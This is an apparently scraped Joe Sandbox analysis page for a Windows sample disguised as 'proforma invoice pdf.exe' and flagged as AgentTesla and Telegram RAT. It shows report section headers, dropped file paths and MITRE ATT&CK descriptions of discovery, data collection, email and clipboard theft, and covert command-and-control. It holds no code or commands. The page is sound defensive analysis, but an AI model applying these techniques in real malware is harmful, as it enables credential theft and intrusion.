Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report proforma invoice pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bmBOz.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proforma invoice pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wTyVrj.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3blbxbq4.5or.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4huqn10l.k5b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fe4i1rgf.n5a.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksbo1h4r.byt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdzicpsg.5gg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvsc3g00.nrh.psm1

Windows Analysis Report
proforma invoice pdf.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre